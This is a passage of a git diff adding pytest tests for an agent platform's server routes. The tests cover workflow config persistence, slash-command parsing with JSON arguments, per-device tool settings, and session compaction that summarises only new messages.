+    config = stored_writes[workflow_routes._workflow_integration_config_key(workflow_id)]  # NOTE(review): lookup assumes the key helper returns a plain str
+    assert response.json()["config"] == config
+    assert config["kind"] == "workflow.integration-config"
+    assert config["publish"]["enabled"] is True
+    assert config["publish"]["apiKeyConfigured"] is True
+    assert "apiKey" not in config["publish"]  # only the "configured" flag is stored, not the service key
+    assert config["triggers"][0]["invoke"]["path"] == "/webhook/workflows/wf-1/hook-default"
+    assert config["triggers"][0]["auth"]["apiKeyConfigured"] is True
+    assert "apiKey" not in config["triggers"][0]["auth"]  # same for the trigger's "demo-secret"
+
+
+@pytest.mark.asyncio
+async def test_persist_workflow_triggers_does_not_overwrite_config_template(
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:  # Persisting triggers must leave an existing config.json unchanged on disk.
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    config_path = workflow_dir / "config.json"
+    config_path.write_text(
+        json.dumps(
+            {
+                "version": 1,
+                "kind": "workflow.integration-config",
+                "workflow": {"id": workflow_id},
+                "publish": {"type": "api_service"},
+                "triggers": [],
+            }
+        ),
+        encoding="utf-8",
+    )
+    before = config_path.read_text(encoding="utf-8")  # snapshot compared against the file after the call
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)  # presumably resets a cached workspace root so it is re-resolved from the new cwd — confirm
+
+    async def _fake_storage_read(_key: Any, *_args: Any, **_kwargs: Any) -> None:
+        return None  # every Storage lookup comes back empty
+
+    monkeypatch.setattr(workflow_routes.Storage, "read", _fake_storage_read)
+
+    workflow_data = {
+        "id": workflow_id,
+        "source": "project",
+        "name": "Demo Workflow",
+        "description": None,
+        "category": "default",
+        "status": "draft",
+        "createdBy": None,
+        "createdAt": 1,
+        "updatedAt": 1,
+        "workflowJson": {
+            "start": "n1",
+            "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+            "edges": [],
+        },
+    }
+    trigger = workflow_routes.TriggerDefinition.model_validate(
+        {
+            "id": "schedule-default",
+            "type": "schedule",
+            "enabled": True,
+            "source": {"intervalSeconds": 60},
+            "runtime": {"noOverlap": True},
+        }
+    )
+
+    await workflow_routes._persist_workflow_triggers(workflow_id, workflow_data, [trigger])
+
+    assert config_path.read_text(encoding="utf-8") == before  # file content is identical after persisting
+
+
+@pytest.mark.asyncio
+async def test_sync_workflow_config_preserves_existing_template(
+    client: AsyncClient,
+    tmp_path: Path,
+    monkeypatch: pytest.MonkeyPatch,
+) -> None:  # With a config.json already on disk, sync reports "file_migrated", stores that config, and leaves the file alone.
+    workspace = tmp_path / "workspace"
+    workflow_id = "wf-1"
+    workflow_dir = workspace / ".flocks" / "plugins" / "workflows" / workflow_id
+    workflow_dir.mkdir(parents=True)
+    (workflow_dir / "workflow.json").write_text(
+        json.dumps(
+            {
+                "start": "n1",
+                "nodes": [{"id": "n1", "type": "python", "code": "result = {'ok': True}"}],
+                "edges": [],
+                "triggers": [{"id": "syslog-default", "type": "syslog", "enabled": True}],
+            }
+        ),
+        encoding="utf-8",
+    )
+    template = {
+        "version": 1,
+        "kind": "workflow.integration-config",
+        "workflow": {"id": workflow_id},
+        "publish": {"type": "api_service"},
+        "triggers": [],
+    }
+    config_path = workflow_dir / "config.json"
+    config_path.write_text(json.dumps(template), encoding="utf-8")
+    before = config_path.read_text(encoding="utf-8")  # snapshot compared against the file after the request
+    monkeypatch.chdir(workspace)
+    monkeypatch.setattr(fs_store, "_workspace_root", None)  # presumably resets a cached workspace root so it is re-resolved from the new cwd — confirm
+
+    response = await client.post(f"/api/workflow/{workflow_id}/config/sync")
+
+    assert response.status_code == 200, response.text
+    body = response.json()
+    assert body["source"] == "file_migrated"
+    assert body["storageKey"] == workflow_routes._workflow_integration_config_key(workflow_id)
+    assert body["config"]["workflow"]["id"] == workflow_id
+    assert body["config"]["publish"] == {"type": "api_service"}
+    assert body["config"]["triggers"] == []  # template triggers win; the syslog trigger from workflow.json is not merged in
+    assert config_path.read_text(encoding="utf-8") == before  # the on-disk template is left untouched
+    stored = await workflow_routes.Storage.read(workflow_routes._workflow_integration_config_key(workflow_id))
+    assert stored == body["config"]  # Storage holds exactly what the response returned
diff --git a/tests/server/test_input_dispatcher.py b/tests/server/test_input_dispatcher.py
index a69bd2f80..ff1c8bae6 100644
--- a/tests/server/test_input_dispatcher.py
+++ b/tests/server/test_input_dispatcher.py
@@ -1,8 +1,9 @@
 from __future__ import annotations
 
 import asyncio
+import base64
 from types import SimpleNamespace
-from unittest.mock import AsyncMock
+from unittest.mock import AsyncMock, MagicMock
 
 import pytest
 
@@ -19,12 +20,30 @@ def test_resolves_alias_to_canonical_name(self):
         assert parsed.command_name == "reset"
         assert parsed.canonical_name == "new"
 
+    def test_reads_structured_arguments_from_metadata(self):  # args keeps the raw text; args_json must equal the commandArgumentsJson value
+        parsed = parse_slash_command(
+            '/bug {"scope":"acp"}',
+            {"commandArgumentsJson": {"scope": "acp"}},  # second argument carries the structured form
+        )
+        assert parsed is not None
+        assert parsed.args == '{"scope":"acp"}'
+        assert parsed.args_json == {"scope": "acp"}
+
     def test_removed_restart_command_no_longer_resolves(self):
         parsed = parse_slash_command("/restart")
         assert parsed is not None
         assert parsed.command_name == "restart"
         assert parsed.command_def is None
 
+    def test_goal_command_resolves(self):  # "/goal" is expected to resolve to a known command of kind "direct"
+        parsed = parse_slash_command("/goal fix tests")
+        assert parsed is not None
+        assert parsed.command_name == "goal"
+        assert parsed.canonical_name == "goal"  # no alias involved: canonical name equals the typed name
+        assert parsed.args == "fix tests"
+        assert parsed.command_def is not None
+        assert parsed.command_def.execution_kind == "direct"
+
 
 class TestDispatchUserInput:
     @pytest.mark.asyncio
@@ -186,6 +205,55 @@ async def test_command_rejects_attachments_when_not_allowed(self):
         assert result.action == "rejected"
         assert "不支持附件" in direct[0]
 
+    @pytest.mark.asyncio
+    async def test_goal_requires_existing_session(self):  # the event carries no sessionID, so /goal must be rejected
+        direct = []
+        sink = CallbackOutputSink(
+            "webui",
+            direct_response=lambda _event, text: _append(direct, text),
+            run_llm=lambda _event, prompt, display: _append([], (prompt, display)),  # appended to a throwaway list; LLM calls are not inspected here
+        )
+        event = UserInputEvent(
+            source_type="webui",
+            text="/goal fix tests",
+            parts=[{"type": "text", "text": "/goal fix tests"}],
+        )
+
+        result = await dispatch_user_input(event, sink)
+
+        assert result.action == "rejected"
+        assert "需要先有一个会话" in direct[0]  # the message says, roughly, "a session is required first"
+
+    @pytest.mark.asyncio
+    async def test_goal_set_runs_llm_without_direct_ack(self, monkeypatch):  # with a session, /goal goes to the LLM and sends no direct reply
+        direct = []
+        llm = []
+        sink = CallbackOutputSink(
+            "webui",
+            direct_response=lambda _event, text: _append(direct, text),
+            run_llm=lambda _event, prompt, display: _append(llm, (prompt, display)),
+        )
+        monkeypatch.setattr(
+            "flocks.command.direct.GoalManager.set_goal",
+            AsyncMock(return_value=SimpleNamespace(objective="fix tests", max_turns=20)),  # stand-in goal object
+        )
+        monkeypatch.setattr(
+            "flocks.command.direct.GoalManager.goal_prompt",
+            MagicMock(return_value="goal prompt"),  # synchronous mock, unlike set_goal above
+        )
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID="ses_goal_dispatch",
+            text="/goal fix tests",
+            parts=[{"type": "text", "text": "/goal fix tests"}],
+        )
+
+        result = await dispatch_user_input(event, sink)
+
+        assert result.action == "llm"
+        assert direct == []  # no direct acknowledgement was sent
+        assert llm == [("goal prompt", "/goal fix tests")]  # (prompt, display) pair captured by run_llm
+
     @pytest.mark.asyncio
     async def test_channel_unsafe_command_is_rejected(self):
         Command.register(
@@ -285,6 +353,30 @@ async def fake_provide(*, directory, init, fn):
 
 
 class TestPromptQueueRoutes:
+    def test_materialize_queued_data_url_returns_readable_file_uri(self, monkeypatch, tmp_path):  # the returned file:// URI must read back to the original bytes
+        from flocks.server.routes import session as session_routes
+        from flocks.session.utils.file_extractor import read_file_part_bytes
+
+        class FakeWorkspace:
+            def resolve_workspace_path(self, rel_path: str):
+                return tmp_path / rel_path  # resolve every relative path under pytest's tmp_path
+
+        monkeypatch.setattr(
+            "flocks.workspace.manager.WorkspaceManager.get_instance",
+            lambda: FakeWorkspace(),  # get_instance now hands back the fake workspace
+        )
+        data_url = "data:image/png;base64," + base64.b64encode(b"png-bytes").decode()
+
+        url = session_routes._materialize_data_url_part(
+            "ses_windows_uri",
+            data_url,
+            "image/png",
+            "screenshot.png",
+        )
+
+        assert url.startswith("file://")
+        assert read_file_part_bytes(url) == b"png-bytes"  # round trip through the project's own file reader
+
     @pytest.mark.asyncio
     async def test_prompt_async_queues_when_session_running_without_creating_message(self, monkeypatch):
         from flocks.server.routes import session as session_routes
diff --git a/tests/server/test_internal_sdk_client.py b/tests/server/test_internal_sdk_client.py
new file mode 100644
index 000000000..801727461
--- /dev/null
+++ b/tests/server/test_internal_sdk_client.py
@@ -0,0 +1,8 @@
+from __future__ import annotations
+
+
+def test_internal_sdk_client_module_imports():  # smoke test: the module imports and exposes both client names
+    import flocks.server.client as client
+
+    assert client.FlocksClient
+    assert client.SessionClient
diff --git a/tests/server/test_server.py b/tests/server/test_server.py
index 6bd56b14b..12ea20652 100644
--- a/tests/server/test_server.py
+++ b/tests/server/test_server.py
@@ -9,7 +9,6 @@
 from fastapi import status
 
 from flocks.server.app import app
-from flocks.task.manager import TaskManager
 from flocks.task.store import TaskStore
 from flocks.task.models import (
     DeliveryStatus,
@@ -54,12 +53,17 @@ async def test_health_check(client):
     assert data["status"] == "healthy"
     assert isinstance(data["version"], str) and data["version"]
     assert "timestamp" in data
-    assert "task_manager_started" in data
-    assert "task_scheduler_running" in data
-    assert "task_scheduler_available" in data
-    assert "task_queue_running" in data
-    assert "task_queue_queued" in data
-    assert "task_stale_running" in data
+    assert "config_dir" in data
+    assert "data_dir" in data
+    assert "task_manager_started" not in data
+    assert "task_scheduler_running" not in data
+    assert "task_scheduler_available" not in data
+    assert "task_manager_error" not in data
+    assert "task_queue_paused" not in data
+    assert "task_queue_running" not in data
+    assert "task_queue_queued" not in data
+    assert "task_stale_running" not in data
+    assert "task_oldest_running_seconds" not in data
 
 
 @pytest.mark.asyncio
@@ -552,4 +556,3 @@ async def test_question_pending_route_lists_session_requests(client):
         clear_request_state(req1["id"])
         clear_request_state(req2["id"])
 
-
diff --git a/tests/server/test_session_command_arguments.py b/tests/server/test_session_command_arguments.py
new file mode 100644
index 000000000..05479db81
--- /dev/null
+++ b/tests/server/test_session_command_arguments.py
@@ -0,0 +1,177 @@
+from __future__ import annotations
+
+import asyncio
+import json
+from types import SimpleNamespace
+from unittest.mock import AsyncMock
+
+import pytest
+
+
+class TestSessionCommandArguments:  # How the session command route and prompt builder carry string and JSON command arguments.
+    @pytest.mark.asyncio
+    async def test_command_route_preserves_arguments_json_metadata(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_json_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()  # run the supplied callback directly; directory and init are ignored
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        payload = {"scope": "acp", "retry": 2}
+        request = session_routes.CommandRequest(command="bug", argumentsJson=payload)
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)  # yield once to the event loop — presumably lets the dispatch scheduled by the route run; confirm
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]  # third positional argument is the event (see the direct _dispatch_sse_input call in the last test)
+        assert event.text == f"/bug {json.dumps(payload, ensure_ascii=False)}"  # JSON-only arguments are rendered into the command text
+        assert event.display_text == f"/bug {json.dumps(payload, ensure_ascii=False)}"
+        assert event.metadata == {"commandArgumentsJson": payload}
+
+    @pytest.mark.asyncio
+    async def test_command_route_keeps_legacy_string_arguments_unchanged(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_string_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()  # run the supplied callback directly; directory and init are ignored
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        request = session_routes.CommandRequest(command="bug", arguments="investigate routing")
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)  # yield once to the event loop — presumably lets the dispatch scheduled by the route run; confirm
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]
+        assert event.text == "/bug investigate routing"
+        assert event.display_text == "/bug investigate routing"
+        assert event.metadata == {}  # plain string arguments add no metadata
+
+    @pytest.mark.asyncio
+    async def test_command_route_prefers_explicit_string_for_display_when_json_also_present(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+
+        dispatch_mock = AsyncMock()
+        session_id = "ses_both_args"
+
+        async def fake_provide(*, directory, init, fn):
+            await fn()  # run the supplied callback directly; directory and init are ignored
+
+        monkeypatch.setattr(session_routes, "_dispatch_sse_input", dispatch_mock)
+        monkeypatch.setattr("flocks.project.instance.Instance.provide", fake_provide)
+        monkeypatch.setattr(
+            "flocks.session.session.Session.get_by_id",
+            AsyncMock(
+                return_value=SimpleNamespace(
+                    id=session_id,
+                    directory="/tmp/project",
+                )
+            ),
+        )
+
+        payload = {"scope": "acp"}
+        request = session_routes.CommandRequest(
+            command="bug",
+            arguments="use this exact text",
+            argumentsJson=payload,
+        )
+
+        resp = await session_routes.send_session_command(session_id, request)
+        assert resp["status"] == "accepted"
+        await asyncio.sleep(0)  # yield once to the event loop — presumably lets the dispatch scheduled by the route run; confirm
+
+        dispatch_mock.assert_awaited_once()
+        event = dispatch_mock.await_args.args[2]
+        assert event.text == "/bug use this exact text"  # the explicit string drives text and display
+        assert event.display_text == "/bug use this exact text"
+        assert event.metadata == {"commandArgumentsJson": payload}  # the JSON still travels in metadata
+
+    def test_build_prompt_request_from_event_attaches_metadata_to_text_part(self):
+        from flocks.server.routes import session as session_routes
+        from flocks.input.events import UserInputEvent
+
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID="ses_meta_parts",
+            text='/bug {"scope":"acp"}',
+            parts=[
+                {"type": "text", "text": '/bug {"scope":"acp"}', "metadata": {"existing": True}},
+                {"type": "file", "url": "file:///tmp/evidence.txt", "filename": "evidence.txt"},
+            ],
+            metadata={"commandArgumentsJson": {"scope": "acp"}},
+            display_text='/bug {"scope":"acp"}',
+        )
+
+        request = session_routes._build_prompt_request_from_event(event, "/bug {\"scope\":\"acp\"}")
+
+        assert request.parts[0]["type"] == "text"
+        assert request.parts[0]["text"] == "/bug {\"scope\":\"acp\"}"
+        assert request.parts[0]["metadata"] == {  # event metadata is merged with the part's existing metadata
+            "existing": True,
+            "commandArgumentsJson": {"scope": "acp"},
+        }
+        assert request.parts[1] == {  # the file part passes through with no metadata added
+            "type": "file",
+            "url": "file:///tmp/evidence.txt",
+            "filename": "evidence.txt",
+        }
+
+    @pytest.mark.asyncio
+    async def test_llm_command_path_passes_arguments_json_into_prompt_parts(self, monkeypatch):
+        from flocks.server.routes import session as session_routes
+        from flocks.input.events import UserInputEvent
+
+        session_id = "ses_llm_metadata"
+        event = UserInputEvent(
+            source_type="webui",
+            sessionID=session_id,
+            text='/bug {"scope":"acp"}',
+            parts=[{"type": "text", "text": '/bug {"scope":"acp"}'}],
+            metadata={"commandArgumentsJson": {"scope": "acp"}},
+            display_text='/bug {"scope":"acp"}',
+        )
+        session = SimpleNamespace(id=session_id, directory="/tmp/project")
+
+        process_mock = AsyncMock()
+        monkeypatch.setattr(session_routes, "_process_session_message", process_mock)
+
+        await session_routes._dispatch_sse_input(session_id, session, event, "/tmp/project")
+
+        process_mock.assert_awaited_once()
+        request = process_mock.await_args.args[2]  # third positional argument is read as the prompt request
+        assert request.parts[0]["type"] == "text"
+        assert request.parts[0]["text"] == '/bug {"scope":"acp"}'
+        assert request.parts[0]["metadata"] == {
+            "commandArgumentsJson": {"scope": "acp"},
+        }
diff --git a/tests/server/test_session_compaction_command.py b/tests/server/test_session_compaction_command.py
index 323b91622..2893c5673 100644
--- a/tests/server/test_session_compaction_command.py
+++ b/tests/server/test_session_compaction_command.py
@@ -33,6 +33,16 @@ async def test_run_session_compaction_uses_latest_user_and_publishes_status():
     async def publish_event(event_name: str, payload: dict) -> None:
         events.append((event_name, payload))
 
+    async def publish_context_usage_update(
+        event_publish_callback,
+        session_id: str,
+        **kwargs,
+    ) -> None:  # noqa: ARG001
+        await event_publish_callback(
+            "context.usage.updated",
+            {"sessionID": session_id, "sections": []},
+        )
+
     with patch(
         "flocks.server.routes.session.Session.get_by_id",
         new=AsyncMock(return_value=session),
@@ -51,7 +61,10 @@ async def publish_event(event_name: str, payload: dict) -> None:
     ), patch(
         "flocks.session.lifecycle.compaction.compaction.SessionCompaction.process",
         new=AsyncMock(return_value="continue"),
-    ) as process_mock:
+    ) as process_mock, patch(
+        "flocks.server.routes.session._publish_context_usage_update",
+        new=publish_context_usage_update,
+    ):
         result = await _run_session_compaction(
             "ses_test",
             event_publish_callback=publish_event,
@@ -67,10 +80,87 @@ async def publish_event(event_name: str, payload: dict) -> None:
             "status": {"type": "compacting", "message": "Compacting context…"},
         },
     )
-    assert events[-1] == (
+    idle_event = (
+        "session.status",
+        {"sessionID": "ses_test", "status": {"type": "idle"}},
+    )
+    usage_event = (
+        "context.usage.updated",
+        {"sessionID": "ses_test", "sections": []},
+    )
+    assert idle_event in events
+    assert usage_event in events
+    assert events.index(idle_event) < events.index(usage_event)
+
+
+@pytest.mark.asyncio
+async def test_run_session_compaction_publishes_usage_when_compaction_stops():  # "stop" outcome: an error is raised, yet idle status and usage are still published
+    session = SimpleNamespace(id="ses_test", directory="/tmp")
+    messages = [
+        SimpleNamespace(
+            id="msg_user",
+            role=MessageRole.USER,
+            agent="rex",
+            model={"providerID": "anthropic", "modelID": "claude-test"},
+        ),
+    ]
+    events: list[tuple[str, dict]] = []
+
+    async def publish_event(event_name: str, payload: dict) -> None:
+        events.append((event_name, payload))  # record every published event in order
+
+    async def publish_context_usage_update(
+        event_publish_callback,
+        session_id: str,
+        **kwargs,
+    ) -> None:  # noqa: ARG001
+        await event_publish_callback(
+            "context.usage.updated",
+            {"sessionID": session_id, "usedTokens": 321, "segments": []},  # fixed payload so the assertion below can match it exactly
+        )
+
+    with patch(
+        "flocks.server.routes.session.Session.get_by_id",
+        new=AsyncMock(return_value=session),
+    ), patch(
+        "flocks.server.routes.session._resolve_compaction_context",
+        new=AsyncMock(return_value=("rex", "anthropic", "claude-test")),
+    ), patch(
+        "flocks.session.lifecycle.revert.SessionRevert.cleanup",
+        new=AsyncMock(),
+    ), patch(
+        "flocks.session.message.Message.list",
+        new=AsyncMock(return_value=messages),
+    ), patch(
+        "flocks.provider.provider.Provider.resolve_model_info",
+        return_value=(200_000, 8_192, None),
+    ), patch(
+        "flocks.session.lifecycle.compaction.compaction.SessionCompaction.process",
+        new=AsyncMock(return_value="stop"),
+    ), patch(
+        "flocks.session.lifecycle.compaction.compaction.pop_last_compaction_error",
+        return_value="provider unavailable",  # expected to surface as the RuntimeError text matched below
+    ), patch(
+        "flocks.server.routes.session._publish_context_usage_update",
+        new=publish_context_usage_update,
+    ):
+        with pytest.raises(RuntimeError, match="provider unavailable"):
+            await _run_session_compaction(
+                "ses_test",
+                event_publish_callback=publish_event,
+            )
+
+    idle_event = (
         "session.status",
         {"sessionID": "ses_test", "status": {"type": "idle"}},
     )
+    usage_event = (
+        "context.usage.updated",
+        {"sessionID": "ses_test", "usedTokens": 321, "segments": []},
+    )
+    assert idle_event in events
+    assert usage_event in events
+    assert events.index(idle_event) < events.index(usage_event)  # idle status must be published before the usage update
 
 
 @pytest.mark.asyncio
diff --git a/tests/server/test_tool_setting_routes.py b/tests/server/test_tool_setting_routes.py
index 1476c3c85..023360fe9 100644
--- a/tests/server/test_tool_setting_routes.py
+++ b/tests/server/test_tool_setting_routes.py
@@ -14,6 +14,7 @@
 
 import json
 from pathlib import Path
+from unittest.mock import AsyncMock
 
 import pytest
 from fastapi import FastAPI
@@ -252,6 +253,64 @@ def test_overlay_disable_works_regardless_of_service(self, tool_client):
         assert enabled_tool.info.enabled is False
         assert _read_settings() == {enabled_tool.info.name: {"enabled": False}}
 
+    def test_device_enable_clears_override_and_enables_global_tool(
+        self, tool_client, monkeypatch: pytest.MonkeyPatch
+    ):  # enabling with a device_id deletes that device's override and turns the tool on globally
+        client, _, disabled_tool = tool_client
+        _set_service(enabled=True)
+        delete_override = AsyncMock(return_value=True)
+        set_override = AsyncMock()
+        monkeypatch.setattr(
+            "flocks.tool.device.store.delete_device_tool_setting",
+            delete_override,
+        )
+        monkeypatch.setattr(
+            "flocks.tool.device.store.set_device_tool_enabled",
+            set_override,
+        )
+
+        res = client.patch(
+            f"/api/tools/{disabled_tool.info.name}?device_id=dev-a",
+            json={"enabled": True},
+        )
+
+        body = res.json()
+        assert res.status_code == 200
+        assert body["enabled"] is True
+        assert disabled_tool.info.enabled is True
+        assert _read_settings() == {disabled_tool.info.name: {"enabled": True}}  # the global settings record the enable
+        delete_override.assert_awaited_once_with("dev-a", disabled_tool.info.name)
+        set_override.assert_not_awaited()  # no per-device override is written when enabling
+
+    def test_device_disable_writes_false_override_only(
+        self, tool_client, monkeypatch: pytest.MonkeyPatch
+    ):  # disabling with a device_id only records a per-device False override
+        client, enabled_tool, _ = tool_client
+        _set_service(enabled=True)
+        delete_override = AsyncMock()
+        set_override = AsyncMock()
+        monkeypatch.setattr(
+            "flocks.tool.device.store.delete_device_tool_setting",
+            delete_override,
+        )
+        monkeypatch.setattr(
+            "flocks.tool.device.store.set_device_tool_enabled",
+            set_override,
+        )
+
+        res = client.patch(
+            f"/api/tools/{enabled_tool.info.name}?device_id=dev-a",
+            json={"enabled": False},
+        )
+
+        body = res.json()
+        assert res.status_code == 200
+        assert body["enabled"] is True  # the response still reports the tool as enabled
+        assert enabled_tool.info.enabled is True  # the tool object itself is not disabled
+        assert _read_settings() == {}  # no global settings entry is written
+        set_override.assert_awaited_once_with("dev-a", enabled_tool.info.name, False)
+        delete_override.assert_not_awaited()
+
 
 class TestResetToolSetting:
     def test_reset_restores_default_and_removes_overlay(self, tool_client):
diff --git a/tests/session/test_compaction_iterative_summary.py b/tests/session/test_compaction_iterative_summary.py
index 2325a0710..17c0a4117 100644
--- a/tests/session/test_compaction_iterative_summary.py
+++ b/tests/session/test_compaction_iterative_summary.py
@@ -11,6 +11,7 @@
 from __future__ import annotations
 
 import asyncio
+from types import SimpleNamespace
 from typing import Any, List
 from unittest.mock import AsyncMock, MagicMock
 
@@ -20,6 +21,7 @@
     DEFAULT_COMPACTION_PROMPT,
     DEFAULT_COMPACTION_PROMPT_WITH_PREVIOUS,
     ITERATIVE_SUMMARY_REBUILD_INTERVAL,
+    SessionCompaction,
 )
 from flocks.session.lifecycle.compaction import compaction as compaction_module
 from flocks.session.lifecycle.compaction.summary import (
@@ -152,6 +154,278 @@ def __init__(self, content: str) -> None:
         self.content = content
 
 
+def _mwp(  # Build a minimal message-with-parts stand-in out of SimpleNamespace objects.
+    message_id: str,
+    role: str,
+    text: str,
+    *,
+    finish: str | None = None,
+    summary: bool | None = None,
+) -> SimpleNamespace:
+    return SimpleNamespace(
+        info=SimpleNamespace(  # message header fields: id, role, finish, summary
+            id=message_id,
+            role=role,
+            finish=finish,
+            summary=summary,
+        ),
+        parts=[  # exactly one part, of type "text", carrying ``text``
+            SimpleNamespace(
+                type="text",
+                text=text,
+            )
+        ],
+    )
+
+
+@pytest.mark.asyncio
+class TestSessionCompactionDeltaInput:  # Which messages SessionCompaction.process() feeds to the summarizer.
+    async def test_process_summarizes_only_messages_after_latest_summary(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:  # Only messages after the latest summary (minus the /compact command) are summarized.
+        compaction_module.reset_iterative_summary_cache("ses_delta")
+        captured: dict[str, Any] = {}
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+        # Fakes below either record what process() hands over or stand in for collaborators.
+        async def fake_summarize_single_pass(*args: Any, **kwargs: Any) -> str:
+            captured["previous_summary"] = kwargs["previous_summary"]
+            captured["chat_messages"] = kwargs["chat_messages"]
+            return _structured_summary("delta")
+
+        async def fake_archive_and_write_summary(cls, **kwargs: Any) -> str:  # noqa: ARG001
+            return "continue"
+
+        async def fake_dispatch_memory_flush(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+        # History: an old exchange, a persisted summary, a new exchange, then the /compact command.
+        msgs_with_parts = [
+            _mwp("old-user", "user", "old request"),
+            _mwp("old-assistant", "assistant", "old answer", finish="stop"),
+            _mwp(
+                "summary-1",
+                "assistant",
+                "persisted previous summary",
+                finish="summary",
+                summary=True,
+            ),
+            _mwp("new-user", "user", "new request"),
+            _mwp("new-assistant", "assistant", "new answer", finish="stop"),
+            _mwp("compact-command", "user", "/compact"),
+        ]
+        # Imported locally; attributes of Provider and Message are monkeypatched below.
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            fake_summarize_single_pass,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(fake_archive_and_write_summary),
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_dispatch_memory_flush",
+            classmethod(fake_dispatch_memory_flush),
+        )
+        # Run a manual (auto=False) compaction whose parent is the /compact command message.
+        result = await SessionCompaction.process(
+            session_id="ses_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+        # The persisted summary text is passed as previous_summary; only the new exchange is summarized.
+        assert result == "continue"
+        assert captured["previous_summary"] == "persisted previous summary"
+        assert [
+            message.content
+            for message in captured["chat_messages"]
+        ] == ["new request", "new answer"]
+        assert ("load", {
+            "message_count": 2,
+            "total_chars": len("new request") + len("new answer"),
+        }) in progress_events
+
+    async def test_process_skips_when_only_compact_command_follows_summary(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
+    ) -> None:  # Nothing but /compact after the summary: expect a skip without summarizing.
+        compaction_module.reset_iterative_summary_cache("ses_no_delta")
+        progress_events: list[tuple[str, dict[str, Any]]] = []
+        summarize_spy = AsyncMock(return_value=_structured_summary("unexpected"))
+        archive_spy = AsyncMock(return_value="continue")
+
+        async def fake_progress(stage: str, data: dict[str, Any]) -> None:
+            progress_events.append((stage, data))
+
+        async def fake_apply_config(cls, **kwargs: Any) -> None:  # noqa: ARG001
+            return None
+
+        async def fake_list_with_parts(cls, session_id: str) -> list:  # noqa: ARG001
+            return msgs_with_parts
+        # History holds only a persisted summary followed by the /compact command.
+        msgs_with_parts = [
+            _mwp(
+                "summary-1",
+                "assistant",
+                "persisted previous summary",
+                finish="summary",
+                summary=True,
+            ),
+            _mwp("compact-command", "user", "/compact"),
+        ]
+        # Imported locally; attributes of Provider and Message are monkeypatched below.
+        from flocks.provider.provider import Provider
+        from flocks.session.message import Message
+
+        monkeypatch.setattr(
+            Provider,
+            "get",
+            classmethod(lambda cls, provider_id: MagicMock()),
+        )
+        monkeypatch.setattr(
+            Provider,
+            "apply_config",
+            classmethod(fake_apply_config),
+        )
+        monkeypatch.setattr(
+            Message,
+            "list_with_parts",
+            classmethod(fake_list_with_parts),
+        )
+        monkeypatch.setattr(
+            compaction_module.summary,
+            "summarize_single_pass",
+            summarize_spy,
+        )
+        monkeypatch.setattr(
+            SessionCompaction,
+            "_archive_and_write_summary",
+            classmethod(lambda cls, **kwargs: archive_spy(**kwargs)),
+        )
+        # Run a manual (auto=False) compaction whose parent is the /compact command message.
+        result = await SessionCompaction.process(
+            session_id="ses_no_delta",
+            parent_id="compact-command",
+            messages=[{"id": "compact-command"}],
+            model_id="test-model",
+            provider_id="test-provider",
+            auto=False,
+            progress_callback=fake_progress,
+        )
+        # Expect a skip: neither spy awaited, an empty "load" event, and a "skipped_no_new_messages" completion.
+        assert result == "skipped"
+        summarize_spy.assert_not_awaited()
+        archive_spy.assert_not_awaited()
+        assert ("load", {"message_count": 0, "total_chars": 0}) in progress_events
+        assert (
+            "complete",
+            {"result": "skipped_no_new_messages"},
+        ) in progress_events
+
+    async def test_process_skips_when_only_control_message_exists(
+        self,
+        monkeypatch: pytest.MonkeyPatch,
